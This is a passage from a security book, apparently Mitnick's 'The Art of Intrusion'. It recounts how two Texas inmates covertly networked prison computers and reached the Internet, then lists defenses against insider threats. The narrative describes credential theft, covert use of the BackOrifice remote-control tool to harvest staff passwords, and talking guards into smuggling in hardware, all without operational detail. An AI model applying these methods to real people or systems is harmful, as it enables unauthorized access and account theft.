   Your organization needs to make the installing of patches a high-priority
item, with a formal patch management process that reduces the window of
exposure as quickly as possible subject to the demands of not interfering
with critical business operations.
   But even being vigilant about installing patches isn’t enough. ne0h says
that some of the break-ins in which he participated were accomplished
through the use of “zero-day” exploits — a break-in based on a vulnera-
bility that is not known to others outside a very small group of hacker bud-
dies. “Zero day” is the day they first exploit the vulnerability, and hence the
day the vendor and the security community first become aware of it.
   Because there is always a potential to be compromised by a zero-day
exploit, every organization using the flawed product is vulnerable until a
patch or workaround is released. So how do you mitigate the risk of this
exposure?
   I believe the only viable solution lies in using a defense in depth model.
We must assume that our publicly accessible computer systems will be
vulnerable to a zero-day attack at some point in time. Thus, we should
create an environment that minimizes the potential damage a bad guy
can do. One example, as mentioned earlier, is to place publicly accessible
systems on the DMZ of the company firewall. The term DMZ, borrowed
from the military/political abbreviation for demilitarized zone, refers to
setting up network architecture so that systems the public has access to
(Web servers, mail servers, DNS servers, and the like) are isolated from
sensitive systems on the corporate network. Deploying a network archi-
tecture that protects the internal network is one example of defense in
depth. With this arrangement, even if hackers discover a previously
unknown vulnerability and a Web server or mail server is compromised,
the corporate systems on the internal network are still protected by
another layer of security.
   Companies can mount another effective countermeasure by monitor-
ing the network or individual hosts for activity that appears unusual or
suspicious. An attacker usually performs certain actions once he or she
has successfully compromised a system, such as attempting to obtain
 46                         The Art of Intrusion


encrypted or plaintext passwords, installing a back door, modifying con-
figuration files to weaken security, or modifying system, application, or
log files, among other efforts. Having a process in place that monitors for
these types of typical hacker behavior and alerts the appropriate staff to
these events can help with damage control.
  On a separate topic, I’ve been interviewed countless times by the press
about the best ways to protect your business and your personal computer
resources in today’s hostile environment. One of my basic recommenda-
tions is to use a stronger form of authentication than static passwords.
You will never know, except perhaps after the fact, when someone else has
found out your password.
  A number of second-level sign-on techniques are available to be used
in combination with a traditional password, to provide much greater
security. In addition to RSA’s SecureID, mentioned earlier, SafeWord
PremierAccess offers passcode-generating tokens, digital certificates,
smart cards, biometrics, and other techniques.
  The trade-offs of using these types of authentication controls are the
added cost and the extra layer of inconvenience for every user. It all
depends on what you’re trying to protect. Static passwords may be suffi-
cient for the LA Times Web site to protect its news articles. But would
you count on static passwords protecting the latest design specs for a new
commercial jetliner?


THE BOTTOM LINE
The stories in this book, as well as in the press, demonstrate the insecu-
rity of this nation’s computer systems and how vulnerable we are to an
attack. It seems as if few systems are truly secure.
   In this age of terrorism, we clearly need to be doing a better job of
stitching up the holes. Episodes like the one recounted here raise an issue
we need to face: how easily the talents and knowledge of our own unwit-
ting teenagers can be turned against us to endanger our society. I believe
that school kids should be taught the principles of computer ethics start-
ing when they are being introduced to computing in elementary school.
   Recently I attended a presentation given by Frank Abagnale, the pro-
tagonist in the blockbuster film Catch Me If You Can. Frank had con-
ducted a survey of high school students across the country about the
ethical use of computers. Each student was asked whether he or she con-
sidered it acceptable behavior to crack the password of a fellow student.
Surprisingly, 48 percent of the surveyed students thought it was just fine.
With attitudes like this, it’s not hard to understand why people become
involved in this type of activity.
                         Chapter 2     When Terrorists Come Calling                            47

  If anyone has a suggestion of how to make young hackers less suscep-
tible to being recruited by our enemies, foreign and domestic, I wish he
or she would speak up and make his or her ideas known.


NOTES
1. “Do Terrorists Troll the Net?” by Niall McKay, Wired.com, November 14, 1998.
2. McKay article, op. cit.
3. McKay article, op. cit.
4. From the Web site satp.org, South Asia Intelligence Review.
5. “The United States and the Global Coalition Against Terrorism, September–December 2001: A
Chronology,” www.state.gov/r/pa/ho/pubs/fs/5889.htm.
6. Address by Major General Yashwant Deva, Avsm (Retd), President Iete, on “Information
Security” at India International Centre, New Delhi on April 6, 2002, p. 9.
7. Confirming this is difficult. Since this attack took place during the Clinton administration, none
of the people listed would be working in the White House any longer. But a few tidbits are avail-
able. Monty Haymes did video recording. Christopher Adams is the name of a reporter with the
Financial Times, a British newspaper; as far as we could ascertain, there was no White House
employee by this name. Debra Reid is a photographer for the Associated Press. No one named
Connie Colabatistto appears to have been working in the White House; a woman by that name is
(or was) married to Gene Colabatistto, who was president of Solutions at the Space Imaging com-
pany, but there is no apparent connection to them being on the White House team.
8. http://www.attrition.org/mirror/attrition/1999/05/10/www.whitehouse.gov/mirror.html.
9. Here, too, verification is difficult to come by. However, the text quoted can be viewed at
http://www.attrition.org/mirror/attrition/1999/05/26/mmic.snu.ac.kr/.
10. “Computer Hackers Could Disable Military; System Compromised in Secret Exercise,” by Bill
Gertz, Washington Times, April 16, 1998.
11. “Wars of the Future... Today,” by Tom Regan, Christian Science Monitor, June 24, 1999.
             Chapter 3
           The Texas Prison Hack
I don’t think there’s any one thing you can say to a youngster to make them
change, other than to have value in themselves, you know, and never take
the short road.
                                                                — William




T
          wo young convicts, each doing extended time for murder, meet
          on a blazing day in the concrete yard of a Texas prison and dis-
          cover they share a fascination with computers. They team up
and become secret hackers right under the noses of watchful guards.
  All that is in the past. These days, William Butler gets into his car at
5:30 every weekday morning and begins the commute to work through
clogged Houston traffic. He considers himself a very lucky man even to
be alive. He’s got a steady girlfriend; he drives a shiny new car. And, he
adds, “I was recently rewarded with a $7,000 raise. Not bad.”
  Like William, his friend Danny is also settled in life and holding down
a steady job doing computer work. But neither will ever forget the long,
slow years paying a hard price for their actions. Strangely, the time in
prison equipped them with the skills they’re now making such good use
of in “the free world.”


Inside: Discovering Computers
Prison is a shock to the newcomer. Arriving inmates are often dumped
together until the unruly and violent can be sorted out — a severe chal-
lenge to those trying to live by the rules. Surrounded by people who


                                      49
 50                          The Art of Intrusion


might explode at any imagined challenge, even the meek have to hang
tough and stand up for themselves. William devised his own set of rules:

      I basically lived how you had to live in there. I’m just 5’10” and
      I was probably 255. But it wasn’t just about being big, it’s a
      mindset that I was not a weak person and I was nobody to be
      taken advantage of. I carried myself like that. Inside, if anybody
      perceives any weakness, then they take advantage of it. I didn’t
      lie, I didn’t chat about other people’s business, and don’t ask me
      about my business because I’ll tell you to get f___ed.
      Danny and I both did time on tough units. You know what I’m
      saying — gladiator units, where you had to fight all the time. So
      we didn’t give a shit about guards or nobody. We would fight at
      the drop of a hat or do whatever we had to do.

  Danny was already serving a 20-year sentence at the Wynne Unit, a
prison in Huntsville, Texas, when William arrived. His initial prison job
had nothing to do with computers.

      They first sent me to a unit where you start you doing field work
      on the farms. You go hoeing up and down rows. They could use
      machines for that, but they don’t — it’s a form of punishment so
      you feel better about whatever job they give you later.

  When Danny was transferred to the Wynne unit, he was grateful to be
assigned clerical work in the Transportation Office. “I started to work on
an Olivetti typewriter with a monitor and a couple of disk drives. It ran
DOS and had a little memory. I messed around trying to learn how to
use it.” (For me, that rang familiar bells: The first computer I ever used
was an Olivetti teletype with a 110-baud acoustic-coupler modem.)
  He found an old computer book lying around, an instruction manual for
the early database program dBase III. “I figured out how to put the reports
on dBase, while everybody else was still typing theirs.” He converted the
office purchase orders to dBase and even started a program to track the
prison’s shipments of farm products to other prisons around the state.
  Eventually Danny made trustee status, which brought a work assign-
ment involving a higher level of trust and what’s referred to as a “gate
pass,” allowing him to work outside the secure perimeter of the prison.
He was sent to a job in the dispatch office in a trailer outside the fence,
preparing shipping orders for the delivery trucks transporting the food
goods. But what really mattered was that it gave him “my first real access
to computers.”
                      Chapter 3   The Texas Prison Hack                 51

  After a while, he was given a small room in the trailer and put in charge
of hardware — assembling new machines and fixing broken ones. Here
was a golden opportunity: learning how to build computers and fix them
from hands-on experience. Some of the people he worked with would
bring in computer books for him, which accelerated his learning curve.
  Being in charge of hardware gave him access to “a shelf full of com-
puter parts with nothing inventoried.” He soon grew reasonably skilled
at assembling machines or adding components. Prison staff didn’t even
inspect the systems to determine how he had configured them, so he
could easily set up machines with unauthorized equipment.


Federal Prisons Are Different
That kind of careless disregard for what a prisoner is up to is unlikely in a
federal prison. The U.S. Bureau of Prisons has a sensibly high level of para-
noia about the subject. During my time inside, I had a “NO COMPUTER”
assignment, which meant it was considered a security threat for me to
have any computer access. Or even access to a phone, for that matter: A
prosecutor once told a federal magistrate that if I was free to use a phone
while in custody, I would be able to whistle into it and send instructions
to an Air Force intercontinental missile. Absurd, but the judge had no
reason not to believe it. I was held in solitary for eight months.
  In the federal system at that time, prisoners were allowed computer
access only under a strict set of guidelines. No inmate could use any
computer that was attached to a modem, or that had a network card or
other communication device. Operationally critical computers and sys-
tems containing sensitive information were clearly marked “Staff Use
Only” so it would be immediately apparent if an inmate was using a com-
puter that put security at risk. Computer hardware was strictly controlled
by technology knowledgeable staff to prevent unauthorized use.


William Gets the Keys to the Castle
When William was transferred from the farm prison to the Wynne unit in
Huntsville, he landed an enviable job in the kitchen. “I had the keys to
the castle because I could trade food for other things.”
  The kitchen had one computer, an ancient 286 machine with a cooling
fan on the front but still good enough for him to make good progress with
developing his computer skills. He was able to put some of the kitchen
records, reports, and purchase order forms on the computer, which saved
hours of adding columns of numbers and typing out paperwork.
  After William discovered there was another prisoner who shared his
interest in computers, Danny was able to help improve the quality of the
 52                          The Art of Intrusion


computer setup in the commissary. He pulled components off the shelf
in the Agriculture trailer and then recruited the aid of some friends with
maintenance assignments, who could go anywhere in the prison.

      They didn’t answer to anyone. So they sneaked computer parts into
      the kitchen for us — just put them into a cart and roll it down.
      Then one Christmas Eve, a guard walked onto the unit with a
      box that basically had parts for a whole computer in it, and a hub
      and other stuff.
  How did he convince a guard to break the rules so blatantly? “I just did
what they call ‘worked my jelly’ on him — I just talked to him and
befriended him.” William’s parents had purchased the computer items at
his request, and the guard agreed to bring in the load of items as if they
were Christmas presents.
  To provide work space for his expanding computer installation, William
appropriated a small storage room attached to the commissary. The room
was unventilated but he was sure that wouldn’t be a problem, and it
wasn’t: “I traded food to get an air conditioner, we knocked a hole in the
wall and put the air conditioner unit in so we could breath and could
work in comfort,” he explained.
  “We built three PCs back there. We took old 286 cases and put
Pentium boards in them. The hard drives wouldn’t fit, so we had to use
toilet paper rolls for hard drive holders,” which, while an innovative solu-
tion, must have been funny to look at.
  Why three computers? Danny would drop in sometimes, and they’d
each have a computer to use. And a third guy later started “a law
office” — charging inmates for researching their legal issues online and
drawing up papers for filing appeals and the like.
  Meanwhile, William’s skills in using a computer to organize the com-
missary’s paperwork came to the attention of the captain in charge of
food service. He gave William an added assignment: When not busy with
regular duties, he was to work on setting up computer files for the cap-
tain’s reports to the warden.
  To carry out these additional responsibilities, William was allowed to
work in the captain’s office, a sweet assignment for a prisoner. But after a
time William began to chafe: Those computers in the commissary were by
now loaded with music files, games, and videos. In the captain’s office, he
had none of these pleasing diversions. Good old American innovation plus
a healthy dose of gutsy fearlessness suggested a way of solving the problem.

      I traded food from the kitchen to get network cable from mainte-
      nance. We had the maintenance clerk order us a 1,000-foot spool
                      Chapter 3   The Texas Prison Hack                    53

     of Cat 5 [Ethernet] cable. We had the guards open up pipe chases
     and ran the cable. I just told them I was doing work for the
     Captain and they’d open the door.

  In short order, he had hardwired an Ethernet connection linking up
the three computers he now had in the commissary, with the computer
in the captain’s office. When the captain wasn’t there, William had the
pleasure of playing his computer games, listening to his music, and
watching his videos.
  But he was running a big risk. What if the captain came back unex-
pectedly and discovered him with music playing and a game on the
screen, or a girlie movie? It would mean goodbye to the privileged posi-
tion in the kitchen, the cushy duties in the captain’s office, and the access
to the computer setup he had so painstakingly assembled.
  Meanwhile, Danny had his own challenges. He was now working in the
Agriculture Office surrounded by computers, with telephone jacks
everywhere connecting to the outside world. He was like a kid with his
nose pressed to the window of the candy store and no money in his
pocket. All those temptations so nearby and no way to enjoy them.
  One day an officer showed up in Danny’s tiny office. “[He] brought his
machine in because he couldn’t get connected to the Internet. I didn’t
really know how a modem worked, there was nobody teaching me any-
thing. But I was able to help him set it up.” In the process of getting the
machine online, the officer, on request, gave Danny his username and
password; probably he didn’t see any problem about doing this, knowing
that inmates weren’t allowed to use any computer with online access.
  Danny realized what the guard was too dense or too technically illiterate
to figure out: He had given Danny an e-ticket to the Internet. Secretly
running a telephone line behind a rack of cabinets into his work area,
Danny hooked it up to the internal modem in his computer. With the
officer’s login and password that he had memorized, he was golden: He
had Internet access.


Online in Safety
For Danny, achieving an Internet connection opened up a whole new
world on his monitor. But just as for William, he ran a huge risk every
time he went online.

     I was able to dial out, pick up information about computers and
     all, and ask questions. I was signing on for the officer but the
     whole time I was afraid it might come to light. I tried to be care-
     ful not to stay on so long that I tied up the lines.
 54                          The Art of Intrusion


   A clever workaround suggested itself. Danny installed a “splitter” on
the phone line going to the fax machine. But it wasn’t long before the
Ag unit began to hear complaints from other prisons wanting to know
why their fax line was busy so much of the time. Danny realized he’d
have to get a dedicated line if he wanted to cruise the Net at leisure and
in safety. A little scouting provided the answer: He discovered two tele-
phone jacks that were live but not in use. Apparently none of the staff
remembered they even existed. He reconnected the wire from his
modem, plugging it into one of the jacks. Now he had his own outside
line. Another problem solved.
   In a corner of his tiny room, under a pile of boxes, he set up a com-
puter as a server — in effect, an electronic storage device for all the great
stuff he planned to download, so the music files and computer hacking
instructions and all the rest wouldn’t be on his own computer, just in case
anybody looked.
   Things were shaping up, but Danny was plagued by one other diffi-
culty, a considerably bigger one. He had no way of knowing what would
happen if he and the officer tried to use the officer’s Internet account at
the same time. If Danny was already connected, would the officer get an
error message saying that he couldn’t get online because his account was
already in use? The man might have been a dense redneck, but surely at
that point he would remember giving Danny his sign-on information and
begin to wonder. At the time, Danny couldn’t think of a solution; the
problem gnawed at him.
   Still, he was proud of what he’d accomplished given the circumstances.
It had taken an enormous amount of work. “I had built up a good foun-
dation — running servers, downloading anything I could get off the
web, running ‘GetRight’ [software] that would keep a download going
twenty-four hours. Games, videos, hacking information, learning how
networks are set up, vulnerabilities, how to find open ports.”
   William understood how Danny’s setup in the Agriculture Department
had been possible. “He was basically the network administrator because
the free-world guy [the civilian employee] they had working there was a
buffoon.” The inmates were being assigned jobs that the employee was
supposed to be doing but didn’t know how, things like “the C++ and
Visual Basic programming,” nor did they have the smarts necessary to
properly administer the network.
   Another challenge also troubled Danny: His computer faced an aisle,
so anybody could see what he was doing. Since the Agriculture Office
was locked up after working hours, he could only go online during the
day, watching for moments when everyone else in the office seemed to
be too busy with their own work to take any interest in what he was up
to. Picking up a clever trick that would allow him to take control of
                      Chapter 3   The Texas Prison Hack                    55

another computer, he connected his machine to the one used by a civilian
employee who worked opposite him. When the man wasn’t there and it
looked like maybe no one would be drifting into the back room for a while,
Danny would commandeer the other computer, put it online, and set it to
download some game or music he wanted to the server in the corner.
  One day when he was in the middle of getting online for a download,
somebody showed up unexpectedly in Danny’s work area: a female
guard — always much more hard-nosed and by-the-rules than the men,
Danny and William agree. Before he could release his control of the other
machine, the guard’s eyes widened: She had noticed the cursor moving!
Danny managed to quit his operation. The guard blinked, probably fig-
uring she must have imagined it, and walked out.


Solution
William still vividly remembers the day when the solution to both of their
Internet access problems occurred to Danny. The kitchen crew was allowed
to take their meals in the officer’s dining room after the officers had finished
and cleared out. William would often sneak Danny in to eat the “much bet-
ter food” in the dining room with him, and they could also talk privately
there. “I can still remember the day I got him up there,” William related.
“He said, ‘I know how we can do it, B.’ That’s what they called me — B,
or Big B. And with it he explained to me what we were gonna do.”
  What Danny envisioned was putting together two pieces of a puzzle;
the telephone lines to the outside world, available to him in the
Agriculture Department, and William’s computers in the kitchen. He
proposed a way that would let the two of them use computers and get
onto the Internet whenever they wanted, in freedom and safety.

     We always sat in the back of the commissary playing games on the
     computers. And I thought, “If we could sit down here and play
     games, and nobody cares — the guards don’t care as long as we
     get our work done — then why can’t we access the Internet from
     right here?”

  The Agriculture Office had computer equipment that was more up-
to-date because, as Danny explained, other prisons around the state
“razzed” to their server. His term “razzed” was a way of saying that com-
puters at the other prisons were connecting by dial-up to the Agriculture
Office server, which was configured to allow dial-up connections through
Microsoft’s RAS (Remote Access Services).
  A key make-or-break element confronted the guys: modems. “Getting
hold of modems was a major deal,” William said. “They kept those pretty
 56                            The Art of Intrusion


tight. But we were able to get our hands on a couple.” When they were
ready to go online from the commissary, “What we would do was dial up
on the inner-unit phone lines and razz into the Agriculture Department.”
  Translation: From the commissary, the guys would enter a command
instructing the computer modem to dial a phone call over an internal
phone line. That call would be received by a modem in the farm shop, a
modem connected to Danny’s server. That server was on a local network
to all the other computers in the office, some of which had modems con-
nected to external phone lines. With commissary and Ag Office com-
puter networks talking to each other over the internal phone line, the
next command would instruct one of those Ag Office computers to dial
out to the Internet. Voilà! Instant access.
  Well, not quite. The two hackers still needed an account with an Internet
service provider. Initially, they used the login names and passwords of per-
sonnel who worked in the department, “when we knew they were gonna
be out of town hunting or something like that,” says Danny. This infor-
mation had been gleaned by installing on the other computers software
called “BackOrifice,” a popular remote monitoring tool that gave them
control of a remote computer as if they were sitting right in front of it.
  Of course, using other people’s passwords was risky — with all sorts of
ways you might get caught. It was William this time who came up with a
solution. “I got my parents to pay for us to have Internet access with a
local service company,” so it was no longer necessary to use other peo-
ple’s sign-on information.
  Eventually they kept the Internet connection through the Agriculture
Office going 24/7. “We had two FTP servers running down there down-
loading movies and music and more hacking tools and all kinds of stuff like
that,” says Danny. “I was getting games that hadn’t even been released yet.”


Nearly Caught
In their commissary headquarters, William hooked up sound cards and
external speakers so they could play music or hear the soundtrack as they
watched a downloaded movie. If a guard asked what they were doing,
William told them, “I don’t ask your business, don’t ask mine.”

      I told [the guards] all the time there’s some things in life that I can
      promise. Number one, I won’t have a pistol and I won’t shoot any-
      body in here. Number two, I will not do drugs and dilute my mind.
      Number three, I’m not gonna have a pimp and I’m not gonna be
      a pimp. Number four, I won’t mess with a female officer.
      I couldn’t promise them that I wouldn’t fight. I never lied to ’em.
      And they respected my honesty and my forthrightness, and so
                      Chapter 3   The Texas Prison Hack                    57

     they’d do things for me. You can get guards to do favors by
     conversation.
     Conversation rules the nation. You talk women out of their
     panties, see what I’m saying, you talk men into doing what you
     want them to do for you.

  But no matter how clever a talker a prisoner may be, no guard is going
to allow an inmate free reign with computers and outside phone lines. So
how did these two get away with their hacker escapades in plain view of
the guards? William explained:

     We were able to do a lot of the stuff we did because they looked at
     us like half wits. We’re in the seat of redneck-dom, so the bosses
     [guards] had no idea what we were doing. They couldn’t even
     fathom what we were capable of.

  Another reason would have to be that these two inmates were doing com-
puter work others had been paid to take care of. “Most of the people they
had there that were supposed to be in the know about things like comput-
ers,” says William, “they just weren’t capable, so they had inmates doing it.”
  This book is full of stories of the chaos and damage hackers can cause,
but William and Danny were not bent on criminal mischief. They merely
wanted to enhance their growing computer skills and keep themselves
entertained — which under their circumstances is hardly difficult to under-
stand. It’s important to William that people appreciate the distinction.

     We never did abuse it or hurt anybody. We never did. I mean from
     my standpoint, I deemed it necessary to learn what I wanted to
     learn so I could go straight and be successful once I was released.

  While the Texas prison officials remained in the dark about what was
going on, they were fortunate that William and Danny had benign motives.
Imagine what havoc the two might have caused; it would have been child’s
play for these guys to develop a scheme for obtaining money or property
from unsuspecting victims. The Internet had become their university and
playground. Learning how to run scams against individuals or break in to
corporate sites would have been a cinch; teenagers and preteens learn these
methods every day from the hacker sites and elsewhere on the Web. And
as prisoners, Danny and William had all the time in the world.
  Maybe there’s a lesson here: Two convicted murderers, but that didn’t
mean they were scum, rotten to the core. They were cheaters who hacked
their way onto the Internet illegally, but that didn’t mean they were will-
ing to victimize innocent people or naively insecure companies.
 58                         The Art of Intrusion


Close Call
The two neophyte hackers didn’t let the pleasurable distraction of
Internet entertainment slow their learning, however. “I was able to get
the books that I wanted from my family,” says William, who felt his
escapades were a form of sorely needed hands-on training. “I wanted to
understand the intricate workings of a TCP/IP network. I needed that
kind of knowledge for when I got out.”

      It was an education but it was fun, too — you know what I’m
      saying? It was fun because I’m an A-type personality — I like
      living on the edge. And it was a way to snub our nose at “the
      man.” Because they were clueless.

   Besides the serious side and the fun side of their Internet use, Danny
and William also got a few kicks from socializing. They started electronic
friendships with some ladies, meeting them in online chat rooms and
communicating by e-mail. With a few, they acknowledged they were in
prison; with most, they neglected to mention the fact. No surprise there.
   Living on the edge can be invigorating but always carries a dire risk.
William and Danny could never stop looking over their shoulders.
   “One time we got close to getting caught,” William remembered. “One
of the officers we didn’t like because he was real paranoid. We didn’t like
to be online while he was working.”
   This particular guard called the commissary one day and found the line
continually busy. “What made him freak out was that one of the other
guys working in the kitchen had started a relationship with a nurse in the
prison clinic.” The guard suspected that the prisoner, George, was tying
up the line with an unauthorized call to his nurse fiancée. In reality, the
phone line was tied up because William was using the Internet. The
guard hurried to the commissary. “We could hear the key in the gate, so
we knew somebody was coming. We shut everything down.”
   When the guard arrived, William was entering reports on the computer
as Danny innocently looked on. The guard demanded to know why the
phone line had been busy for so long. William was ready for him and
reeled off a story about needing to make a call to get information for the
report he was working on.

      We couldn’t have gotten an outside line from back there, and he
      knew it, but this guy was just super-paranoid. He thought that
      somehow we had helped George call his fiancée.
                     Chapter 3   The Texas Prison Hack                     59

  Whether he believed William’s story or not, without proof the guard
couldn’t do anything. George later married the nurse; as far as William
knows, he’s still in prison and still happily married.


Growing Up
How does a youngster like William — a kid from a stable home with car-
ing, supportive parents — land in prison? “My growing up was excellent,
man. I was a C student but very smart. Never played football and all that
stuff, but never got into any trouble until I went off to college.”
  Being raised Southern Baptist was not a positive experience for William.
Today, he feels that mainstream religion can harm a young person’s self-
esteem. “You know, teaching that you’re worthless from the get-go.” He
attributes his poor choices in part to the fact that he had become con-
vinced he couldn’t be successful. “You know, I had to gain my self-respect
and self-esteem from somewhere and I gained it from people fearing me.”
  A student of philosophy, William understood what Friedrich Nietzsche
meant by a “metamorphosis of the spirit”:

     I don’t know if you’ve ever read any Nietzsche, but he spoke of the
     camel, the lion, and the child. And I was really a camel — I did
     what I thought would make people happy to gain self-worth from
     people liking me, rather than me liking myself and carrying
     myself on my own merit.

  Despite this, William made it through high school with an unblemished
record. His troubles started after he enrolled in a junior college in the
Houston area, then transferred to a school in Louisiana to study aviation.
The instinct to please others turned into a need for respect.

     I saw that I could make money selling Ecstasy and stuff. People
     feared me ’cause I was always armed and would always fight,
     and you know, just live life like an idiot. And then got myself in
     a situation of a drug deal gone bad.

  He and his customer ended up rolling around, struggling for control.
The other guy’s buddy showed up; it was two against one, and William
knew he had to do something desperate or he would never walk away
from there. He pulled out his gun and fired. And the man was dead.
  How does a boy from a strong, stable family face this hard reality? How
does he share the dreadful news?

     One of the hardest things in my life to do was tell my mother that
     I did it. Yeah, it was very hard.
 60                          The Art of Intrusion


  William had a lot of time to think about what landed him in prison. He
doesn’t blame anyone but himself. “You know, it was just the choices I
made because my self-esteem was wrecked. And it wasn’t nothing that
my parents did because they brought me up the way that they thought
they should.”
  For Danny, everything went wrong in a single night.

      I was just a stupid kid. The night of my eighteenth birthday, they
      gave me a big party. On the way home, a couple of the girls
      needed to use the restroom, so I pulled off at a restaurant.
      When they came out, they had a couple of guys following them
      and harassing them. We piled out of the car and there was a big
      fight, and before everything was over, I ran over one of them.
      And then I panicked and we drove off. I left the scene.

  It was the Richard Nixon/Martha Stewart syndrome at work: not
being willing to step up and take responsibility for his action. If Dan
hadn’t driven off, the charge would most likely have been manslaughter.
Leaving the scene compounded the mistake, and once he was tracked
down and arrested, it was too late for anyone to believe it might have
been accidental.


Back in the Free World
William was a quarter of the way through a 30-year sentence, but he
wasn’t having any success on his annual visits before the parole board.
His talent for taking the initiative again came to the fore. He began writ-
ing letters to the parole board, one letter every two weeks, with copies
addressed individually to each of the three board members. The letters
detailed how constructive he was being: “What courses I was taking, the
grades I was getting, the computer books I was reading, and so on,”
showing them that “I’m not frivolous and I’m not wasting my time.”
  He says, “One of the members told my mom, ‘I got more mail from
him than my six kids combined.’” It worked: He kept it up for almost a
year and on his next appearance before the board, they signed him out.
Danny, on a shorter sentence, was released about the same time.
  Since leaving prison, both William and Danny live fiercely determined
to stay out of trouble, working computer-related jobs with skills gained
during their years “inside.” While each took college-level tech courses in
prison, both believe their hands-on experience, perilous though it was,
gave them the advanced skills they now depend on for their living.
                     Chapter 3   The Texas Prison Hack                   61

  Danny earned 64 college credit hours in prison, and though he fell
short of earning any professional certifications, now works with high-
powered, critical applications including Access and SAP.
  Before prison, William completed his freshman year in college and was
a sophomore, with his parents supporting him. Once he got out, he was
able to continue his education. “I applied for financial aid and got it and
went to school. I got straight A’s and also worked in the school’s com-
puter center.”
  He now has two associate’s degrees — in liberal arts and network com-
puter maintenance — both paid for by financial aid. Despite the two
degrees, William didn’t have quite the luck of Danny in landing a com-
puter job. So he took what he could find, accepting a position involving
physical labor. Credit his determination and his employer’s open-minded
attitude: As soon as the firm recognized his computer skills, he was pulled
off the physical tasks and set to work at a job that makes better use of his
technical qualifications. It’s routine business computing, not the network
designing he’d rather be doing, but he satisfies that urge by spending
time on weekends figuring out low-cost ways of networking the com-
puter systems for two Houston-area churches, as a volunteer.
  These two men stand as exceptions. In one of the most pressing and
least-discussed challenges of contemporary American society, most felons
released from prison face a near-impossible hurdle of finding work, espe-
cially any job that pays enough to support a family That’s not hard to
understand: How many employers can be confident about the idea of hir-
ing a murderer, an armed robber, a rapist? In many states they are ineli-
gible for welfare, leaving few ways of supporting themselves while
continuing the near-hopeless search for work. Their options are severely
limited — and then we wonder why so many quickly return to prison,
and assume it must be that they lack the will to live by the rules.
  Today, William has some solid advice for young people and their parents:

     I don’t think there’s any one thing you can say to a youngster to
     make them change, other than to have value in themselves, you
     know, and never take the short road, ’cause the long road always
     seems to be the most rewarding in the end. And you know, never
     sit stagnant because you don’t feel you’re worthy enough to do
     what you need to do.

  Danny would no doubt also agree with these words of William’s:

     I wouldn’t trade my life now for nothin’ on earth. I’ve come to
     believe that I can gain my way in life by my own merit and not
 62                          The Art of Intrusion


      take shortcuts. Over the years I learned that I could have people
      respect me on my own merit. That’s what I try to live by today.


INSIGHT
This story makes clear that many computer attacks can’t be protected
against just by securing the perimeter. When the villain isn’t some teen
hacker or computer-skilled thief but an insider — a disgruntled
employee, a bitter former worker recently fired, or, as in this case, some
other type of insiders like William and Danny.
  Insiders often pose a greater threat than the attackers we read about in
the newspapers. While the majority of security controls are focused on
protecting the perimeter against the outside attacker, it’s the insider who
has access to physical and electronic equipment, cabling, telephone clos-
ets, workstations, and network jacks. They also know who in the organi-
zation handles sensitive information and what computer systems the
information is stored on, as well as how to bypass any checks put in place
to reduce theft and fraud.
  Another aspect of their story reminds me of the movie Shawshank
Redemption. In it, a prisoner named Andy is a CPA. Some of the guards
have him prepare their tax returns and he gives them advice on the best
ways of structuring their finances to limit their tax liability. Andy’s abili-
ties become widely known among the prison staff; leading to more book-
keeping work at higher levels in the prison, until eventually he’s able to
expose the Warden, who has been “cooking” the books. Not just in a
prison but everywhere, we all need to be careful and discreet about
whom we give sensitive information to.
  In my own case, the United States Marshal Service created a high level
of paranoia about my capabilities. They placed a warning in my file cau-
tioning prison officials not to disclose any personal information to me —
not even giving me their names, since they believed a wild rumor that I
could tap into the government’s plethora of secret databases and erase
the identity of anyone, even a Federal Marshal. I think they had watched
“The Net” one too many times.


COUNTERMEASURES
Among the most significant security controls that can be effective in pre-
venting and detecting insider abuse are these:

  Accountability. Two common practices raise accountability issues: the
   use of so-called role-based accounts — accounts shared by multiple
   users; and the practice of sharing account information or passwords
                  Chapter 3   The Texas Prison Hack               63

 to permit access when an employee is out of the office or unavail-
 able. Both create an environment of plausible deniability when
 things go seriously wrong.
 Very simply, sharing account information should be discouraged if
 not altogether prohibited. This includes allowing one worker to
 use his/her workstation when this requires providing sign-on
 information.
Target-rich environment. In most businesses, an attacker who can
 find a way of getting into the work areas of the facility can easily
 find a way to gain access to systems. Few workers lock their com-
 puters when leaving their work area or use screensaver or start-up
 passwords. It only takes seconds for a malicious person to install
 stealth monitoring software on an unprotected workstation. In a
 bank, tellers always lock their cash drawer before walking away.
 Unfortunately, it’s rare to see this practice being used at other
 types of institutions.
 Consider implementing a policy that requires the use of a screen-
 saver password or other program to electronically lock the
 machine. Ensure that the IT department enforces this policy
 through configuration management.
Password management. My girlfriend was recently employed by a
 Fortune 50 company that uses a predictable pattern in assigning
 passwords for outside web-based intranet access: the user’s name
 followed by a random three-digit number. This password is set
 when the person is hired and cannot ever be changed by the
 employee. This makes it possible for any employee to write a
 simple script that can determine the password in no more than
 1,000 tries — a matter of a few seconds.
 Employee passwords, whether set by the company or selected by
 the employees, must not have a pattern that makes them easily
 predictable.
Physical access. Knowledgeable employees familiar with the com-
 pany’s network can easily use their physical access to compromise
 systems when no one is around. At one point I was an employee
 of GTE of California, the telecommunications company. Having
 physical access to the building was like having the keys to the
 kingdom — everything was wide open. Anyone could walk up to
 a workstation in an employee’s cubicle or office and gain access
 to sensitive systems.
 If employees would properly secure their desktops, workstations,
 laptops, and PDA devices, by using secure BIOS passwords and
 logging out, or locking their computer, the bad guy on the inside
 will need more time to accomplish his objectives.
64                        The Art of Intrusion


  Train employees to feel comfortable challenging people whose
  identity is uncertain, especially in sensitive areas. Use physical secu-
  rity controls like cameras and/or badge access systems to control
  entry, surveillance, and movement within the facility. Consider
  periodically auditing physical entry and exit logs to identify unusual
  patterns of behavior, especially when a security incident arises.
“Dead” cubicles and other access points. When an employee
  leaves the company or is transferred to a different position, leaving
  a cubicle empty, a malicious insider can connect via the live net-
  work jacks in the cubicle to probe the network while protecting
  his/her identity. Or worse, a workstation often remains behind in
  the cubicle, plugged into the network ready for anyone to use,
  including the malicious insider (and, as well, any unauthorized
  visitor who discovers the abandoned cubicle).
  Other access points in places like conference rooms also offer easy
  access to the insider bent on doing damage.
  Consider disabling all unused network jacks to prevent anonymous
  or unauthorized access. Ensure that any computer systems in
  vacant cubicles are secured against unauthorized access.
Exiting personnel. Any worker who has given notice of termination
  should be considered a potential risk. Such employees should be
  monitored for any access to confidential business information,
  especially copying or downloading a significant amount of data.
  With tiny USB flash drives now readily available that can hold a
  gigabyte or more of data, it can be a matter of minutes to load
  up large amounts of sensitive information and walk out the door
  with it.
